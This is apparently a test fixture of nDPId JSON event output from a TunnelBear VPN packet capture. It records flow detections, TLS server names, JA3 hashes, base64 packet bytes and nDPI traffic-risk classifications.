+01021{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734755247,"flow_last_seen":1655734755261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":229,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1655734755261,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"157.240.7.32","src_port":60224,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mqtt-mini.facebook.com","ja3":"82932b3c6398511df186dfc9416db2d4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +01063{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":205,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734755247,"flow_last_seen":1655734755401,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2760,"flow_tot_l4_payload_len":2989,"flow_avg_l4_payload_len":498,"midstream":0,"thread_ts_msec":1655734755401,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"157.240.7.32","src_port":60224,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mqtt-mini.facebook.com","ja3":"82932b3c6398511df186dfc9416db2d4","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734759670,"flow_last_seen":1655734759670,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734759670,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"99.83.135.170","src_port":47594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1655734759670,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734759670,"pkt":"ABoRAAACABoRAAABCABFAAA8gORAAEAGxNEKCAABY1OHqrnqAbsKjg29AAAAAKAC\/\/\/wSgAAAgQFtAQCCAoBZI1ZAAAAAAEDAwg="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1655734759675,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734759675,"pkt":"ABoRAAACABoRAAABCABFAAAoAFRAABAGdXZjU4eqCggAAQG7uer1cfJCCo4NvlAS\/\/\/\/JQAA"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1655734759675,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734759675,"pkt":"ABoRAAACABoRAAABCABFAAAogOVAAEAGxOQKCAABY1OHqrnqAbsKjg2+9XHyQ1AQ\/\/\/\/JgAA"} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734759670,"flow_last_seen":1655734759678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655734759678,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"99.83.135.170","src_port":47594,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"capi.grammarly.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734759670,"flow_last_seen":1655734760073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1553,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1655734760073,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"99.83.135.170","src_port":47594,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"capi.grammarly.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1655734759670,"flow_last_seen":1655734760124,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4026,"flow_tot_l4_payload_len":5579,"flow_avg_l4_payload_len":697,"midstream":0,"thread_ts_msec":1655734760124,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"99.83.135.170","src_port":47594,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"capi.grammarly.com","server_names":"capi.grammarly.com,capi-msdk.grammarly.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=capi.grammarly.com","fingerprint":"1F:4A:0B:A6:60:01:94:7D:3D:94:03:14:5A:30:AF:64:D5:EC:58:DD"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734764418,"flow_last_seen":1655734764418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734764418,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.200.188","src_port":47046,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1655734764418,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734764418,"pkt":"ABoRAAACABoRAAABCABFAAA8CMpAAEAGFLAKCAABSn3IvLfGFGxd05k2AAAAAKAC\/\/\/UHwAAAgQFtAQCCAoBZJH8AAAAAAEDAwg="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1655734764423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734764423,"pkt":"ABoRAAACABoRAAABCABFAAAoAGFAABAGTS1Kfci8CggAARRst8aiLGbJXdOZN1AS\/\/\/GXAAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":244,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1655734764423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734764423,"pkt":"ABoRAAACABoRAAABCABFAAAoCMtAAEAGFMMKCAABSn3IvLfGFGxd05k3oixmylAQ\/\/\/GXQAA"} +01147{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734764418,"flow_last_seen":1655734764426,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1655734764426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.200.188","src_port":47046,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"58e34c2965c9f3fa4919d58deef1f49e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":247,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1655734524335,"flow_last_seen":1655734525874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3657,"flow_tot_l4_payload_len":13718,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1655734764426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":247,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1655734524340,"flow_last_seen":1655734524597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3657,"flow_tot_l4_payload_len":4733,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1655734764426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":247,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1655734524343,"flow_last_seen":1655734524541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3655,"flow_tot_l4_payload_len":4731,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1655734764426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45108,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":247,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1655734524346,"flow_last_seen":1655734524597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3658,"flow_tot_l4_payload_len":4734,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1655734764426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":247,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1655734525210,"flow_last_seen":1655734525633,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":894,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1655734764426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":247,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1655734525218,"flow_last_seen":1655734525773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":749,"flow_tot_l4_payload_len":3489,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1655734764426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.115.40","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"}} +01186{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":247,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1655734764418,"flow_last_seen":1655734764619,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":736,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1655734764619,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.200.188","src_port":47046,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mtalk.google.com","ja3":"58e34c2965c9f3fa4919d58deef1f49e","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734776460,"flow_last_seen":1655734776460,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734776460,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33830,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1655734776460,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734776460,"pkt":"ABoRAAACABoRAAABCABFAAA8JvtAAEAGL38KCAABaBFyKIQmAbsyg7tFAAAAAKAC\/\/9Q8AAAAgQFtAQCCAoBZJ2+AAAAAAEDAwg="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1655734776464,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776464,"pkt":"ABoRAAACABoRAAABCABFAAAoAGhAABAGhiZoEXIoCggAAQG7hCbNfES6MoO7RlAS\/\/9FrgAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1655734776465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776465,"pkt":"ABoRAAACABoRAAABCABFAAAoJvxAAEAGL5IKCAABaBFyKIQmAbsyg7tGzXxEu1AQ\/\/9FrwAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734776460,"flow_last_seen":1655734776467,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734776467,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33830,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734776512,"flow_last_seen":1655734776512,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734776512,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.154.236","src_port":50904,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1655734776512,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734776512,"pkt":"ABoRAAACABoRAAABCABFAAA8+whAAEAGMq0KCAABaBGa7MbYAbtnT2bDAAAAAKAC\/\/8FIwAAAgQFtAQCCAoBZJ3LAAAAAAEDAwg="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1655734776516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776516,"pkt":"ABoRAAACABoRAAABCABFAAAoAGpAABAGXWBoEZrsCggAAQG7xtiYsJk8Z09mxFAS\/\/\/aNwAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1655734776516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776516,"pkt":"ABoRAAACABoRAAABCABFAAAo+wlAAEAGMsAKCAABaBGa7MbYAbtnT2bEmLCZPVAQ\/\/\/aOAAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734776516,"flow_last_seen":1655734776516,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734776516,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33838,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1655734776516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734776516,"pkt":"ABoRAAACABoRAAABCABFAAA8p\/tAAEAGrn4KCAABaBFyKIQuAbtZOTo3AAAAAKAC\/\/+rMgAAAgQFtAQCCAoBZJ3MAAAAAAEDAwg="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1655734776519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776519,"pkt":"ABoRAAACABoRAAABCABFAAAoAGtAABAGhiNoEXIoCggAAQG7hC6mxsXIWTk6OFAS\/\/9FpgAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1655734776519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776519,"pkt":"ABoRAAACABoRAAABCABFAAAop\/xAAEAGrpEKCAABaBFyKIQuAbtZOTo4psbFyVAQ\/\/9FpwAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655734776516,"flow_last_seen":1655734776520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1655734776520,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33838,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TunnelBear","breed":"Acceptable","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.polargrizzly.com","ja3":"e9ec38c2b40ff3e300e9975dd7619902","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734776520,"flow_last_seen":1655734776520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734776520,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1655734776520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734776520,"pkt":"ABoRAAACABoRAAABCABFAAA8vpVAAEAGl+QKCAABaBFyKIQyAbvrdiNYAAAAAKAC\/\/8vzwAAAgQFtAQCCAoBZJ3NAAAAAAEDAwg="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1655734776527,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655734776527,"pkt":"ABoRAAACABoRAAABCABFAAAoAG1AABAGhiFoEXIoCggAAQG7hDIUidyn63YjWVAS\/\/9FogAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655734776527,"flow_last_seen":1655734776527,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655734776527,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"104.17.114.40","src_port":33846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"tunnelbear.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1655734776527,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655734776527,"pkt":"ABoRAAACABoRAAABCABFAAA8wepAAEAGlI8KCAABaBFyKIQ2AbtYcFwkAAAAAKAC\/\/+KBAAAAgQFtAQCCAoBZJ3OAAAAAAEDAwg="} 